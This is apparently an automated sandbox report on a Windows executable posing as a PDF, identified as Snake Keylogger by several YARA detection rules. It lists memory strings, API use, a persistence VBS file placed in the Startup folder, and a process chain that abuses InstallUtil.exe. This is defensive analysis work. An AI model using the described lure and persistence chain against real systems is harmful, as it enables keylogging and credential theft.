                Source: File07098.PDF.exe, 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2092659127.0000000005C8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBngsfvj.exe0 vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.000000000279E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2094031243.0000000005D00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameGilcdbotfkc.dll" vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBngsfvj.exe0 vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.000000000241D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.00000000035B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.00000000035B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGilcdbotfkc.dll" vs File07098.PDF.exe
                Source: File07098.PDF.exe, 00000000.00000002.2077497584.00000000005FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs File07098.PDF.exe
                Source: File07098.PDF.exe Binary or memory string: OriginalFilenameBngsfvj.exe0 vs File07098.PDF.exe
                Source: File07098.PDF.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000005.00000002.2265233058.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2078600685.0000000002834000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.2285828812.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.4479810620.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.2285828812.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2089546543.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: InstallUtil.exe PID: 2460, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: InstallUtil.exe PID: 2460, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: File07098.PDF.exe, ResolverExporterExporter.cs Cryptographic APIs: 'CreateDecryptor'
                Source: Current.exe.0.dr, ResolverExporterExporter.cs Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, MnsHMHQ394wlpMTwA12.cs Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                Source: C:\Users\user\Desktop\File07098.PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
                Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs"
                Source: File07098.PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: File07098.PDF.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\File07098.PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: InstallUtil.exe, 00000002.00000002.4484950182.0000000002F57000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4489273646.0000000003D9A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4484950182.0000000002F39000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000026A4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000026F6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000026B4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4483465030.00000000026C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: File07098.PDF.exe ReversingLabs: Detection: 63%
                Source: C:\Users\user\Desktop\File07098.PDF.exe File read: C:\Users\user\Desktop\File07098.PDF.exe
                Source: unknown Process created: C:\Users\user\Desktop\File07098.PDF.exe "C:\Users\user\Desktop\File07098.PDF.exe"
                Source: C:\Users\user\Desktop\File07098.PDF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs"
                Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\Current.exe "C:\Users\user\AppData\Roaming\Current.exe"
                Source: C:\Users\user\AppData\Roaming\Current.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: rasapi32.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: rasman.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: rtutils.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: secur32.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\File07098.PDF.exe Section loaded: ntmarta.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
